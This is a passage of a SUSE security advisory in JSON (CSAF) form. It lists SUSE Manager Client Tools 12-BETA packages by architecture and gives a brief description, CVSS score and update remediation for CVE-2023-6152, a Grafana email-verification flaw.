"product_id": "mgrctl-bash-completion-0.1.7-3.8.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"product": {
"name": "mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"product_id": "mgrctl-zsh-completion-0.1.7-3.8.1.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-check-5.0.4-55.51.1.noarch",
"product": {
"name": "python2-spacewalk-check-5.0.4-55.51.1.noarch",
"product_id": "python2-spacewalk-check-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"product": {
"name": "python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"product_id": "python2-spacewalk-client-setup-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"product": {
"name": "python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"product_id": "python2-spacewalk-client-tools-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-5.0.5-41.48.1.noarch",
"product": {
"name": "spacecmd-5.0.5-41.48.1.noarch",
"product_id": "spacecmd-5.0.5-41.48.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-check-5.0.4-55.51.1.noarch",
"product": {
"name": "spacewalk-check-5.0.4-55.51.1.noarch",
"product_id": "spacewalk-check-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-setup-5.0.4-55.51.1.noarch",
"product": {
"name": "spacewalk-client-setup-5.0.4-55.51.1.noarch",
"product_id": "spacewalk-client-setup-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-5.0.4-55.51.1.noarch",
"product": {
"name": "spacewalk-client-tools-5.0.4-55.51.1.noarch",
"product_id": "spacewalk-client-tools-5.0.4-55.51.1.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch",
"product": {
"name": "supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch",
"product_id": "supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"product": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"product_id": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"product": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"product_id": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"product": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"product_id": "golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-4.27.1.ppc64le",
"product": {
"name": "grafana-9.5.16-4.27.1.ppc64le",
"product_id": "grafana-9.5.16-4.27.1.ppc64le"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-3.8.1.ppc64le",
"product": {
"name": "mgrctl-0.1.7-3.8.1.ppc64le",
"product_id": "mgrctl-0.1.7-3.8.1.ppc64le"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-3.21.1.ppc64le",
"product": {
"name": "uyuni-base-common-5.0.2-3.21.1.ppc64le",
"product_id": "uyuni-base-common-5.0.2-3.21.1.ppc64le"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-3.21.1.ppc64le",
"product": {
"name": "uyuni-base-proxy-5.0.2-3.21.1.ppc64le",
"product_id": "uyuni-base-proxy-5.0.2-3.21.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"product": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"product_id": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"product": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"product_id": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"product": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"product_id": "golang-github-prometheus-promu-0.14.0-4.15.1.s390x"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-4.27.1.s390x",
"product": {
"name": "grafana-9.5.16-4.27.1.s390x",
"product_id": "grafana-9.5.16-4.27.1.s390x"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-3.8.1.s390x",
"product": {
"name": "mgrctl-0.1.7-3.8.1.s390x",
"product_id": "mgrctl-0.1.7-3.8.1.s390x"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-3.21.1.s390x",
"product": {
"name": "uyuni-base-common-5.0.2-3.21.1.s390x",
"product_id": "uyuni-base-common-5.0.2-3.21.1.s390x"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-3.21.1.s390x",
"product": {
"name": "uyuni-base-proxy-5.0.2-3.21.1.s390x",
"product_id": "uyuni-base-proxy-5.0.2-3.21.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"product": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"product_id": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"product_id": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"product": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"product_id": "golang-github-prometheus-promu-0.14.0-4.15.1.x86_64"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-4.27.1.x86_64",
"product": {
"name": "grafana-9.5.16-4.27.1.x86_64",
"product_id": "grafana-9.5.16-4.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-3.8.1.x86_64",
"product": {
"name": "mgrctl-0.1.7-3.8.1.x86_64",
"product_id": "mgrctl-0.1.7-3.8.1.x86_64"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-3.21.1.x86_64",
"product": {
"name": "uyuni-base-common-5.0.2-3.21.1.x86_64",
"product_id": "uyuni-base-common-5.0.2-3.21.1.x86_64"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-3.21.1.x86_64",
"product": {
"name": "uyuni-base-proxy-5.0.2-3.21.1.x86_64",
"product_id": "uyuni-base-proxy-5.0.2-3.21.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 12-BETA",
"product": {
"name": "SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64"
},
"product_reference": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le"
},
"product_reference": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x"
},
"product_reference": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64"
},
"product_reference": "golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le"
},
"product_reference": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x"
},
"product_reference": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.aarch64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.aarch64"
},
"product_reference": "golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le"
},
"product_reference": "golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.s390x as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.s390x"
},
"product_reference": "golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.14.0-4.15.1.x86_64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.x86_64"
},
"product_reference": "golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-4.27.1.aarch64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.aarch64"
},
"product_reference": "grafana-9.5.16-4.27.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-4.27.1.ppc64le as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.ppc64le"
},
"product_reference": "grafana-9.5.16-4.27.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-4.27.1.s390x as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.s390x"
},
"product_reference": "grafana-9.5.16-4.27.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-4.27.1.x86_64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.x86_64"
},
"product_reference": "grafana-9.5.16-4.27.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-3.8.1.aarch64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.aarch64"
},
"product_reference": "mgrctl-0.1.7-3.8.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-3.8.1.ppc64le as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.ppc64le"
},
"product_reference": "mgrctl-0.1.7-3.8.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-3.8.1.s390x as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.s390x"
},
"product_reference": "mgrctl-0.1.7-3.8.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-3.8.1.x86_64 as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.x86_64"
},
"product_reference": "mgrctl-0.1.7-3.8.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.7-3.8.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-bash-completion-0.1.7-3.8.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.7-3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.7-3.8.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:mgrctl-zsh-completion-0.1.7-3.8.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python2-spacewalk-check-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:python2-spacewalk-check-5.0.4-55.51.1.noarch"
},
"product_reference": "python2-spacewalk-check-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python2-spacewalk-client-setup-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-setup-5.0.4-55.51.1.noarch"
},
"product_reference": "python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python2-spacewalk-client-tools-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-tools-5.0.4-55.51.1.noarch"
},
"product_reference": "python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.5-41.48.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:spacecmd-5.0.5-41.48.1.noarch"
},
"product_reference": "spacecmd-5.0.5-41.48.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-check-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:spacewalk-check-5.0.4-55.51.1.noarch"
},
"product_reference": "spacewalk-check-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-setup-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:spacewalk-client-setup-5.0.4-55.51.1.noarch"
},
"product_reference": "spacewalk-client-setup-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-5.0.4-55.51.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:spacewalk-client-tools-5.0.4-55.51.1.noarch"
},
"product_reference": "spacewalk-client-tools-5.0.4-55.51.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch as component of SUSE Manager Client Tools 12-BETA",
"product_id": "SUSE Manager Client Tools 12-BETA:supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch"
},
"product_reference": "supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 12-BETA"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-6152"
}
],
"notes": [
{
"category": "general",
"text": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.aarch64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.s390x",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.aarch64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.s390x",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-bash-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacecmd-5.0.5-41.48.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-6152",
"url": "https://www.suse.com/security/cve/CVE-2023-6152"
},
{
"category": "external",
"summary": "SUSE Bug 1219912 for CVE-2023-6152",
"url": "https://bugzilla.suse.com/1219912"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.aarch64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.s390x",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.aarch64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.s390x",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-bash-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacecmd-5.0.5-41.48.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-alertmanager-0.26.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-node_exporter-1.7.0-4.18.2.x86_64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.aarch64",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.s390x",
"SUSE Manager Client Tools 12-BETA:golang-github-prometheus-promu-0.14.0-4.15.1.x86_64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.aarch64",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.s390x",
"SUSE Manager Client Tools 12-BETA:grafana-9.5.16-4.27.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.aarch64",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.ppc64le",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.s390x",
"SUSE Manager Client Tools 12-BETA:mgrctl-0.1.7-3.8.1.x86_64",
"SUSE Manager Client Tools 12-BETA:mgrctl-bash-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:mgrctl-zsh-completion-0.1.7-3.8.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:python2-spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacecmd-5.0.5-41.48.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-check-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-setup-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:spacewalk-client-tools-5.0.4-55.51.1.noarch",
"SUSE Manager Client Tools 12-BETA:supportutils-plugin-susemanager-client-5.0.3-9.21.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:04:12Z",
"details": "moderate"
}
],
"title": "CVE-2023-6152"
}
]
}
SUSE-SU-2024:1427-1
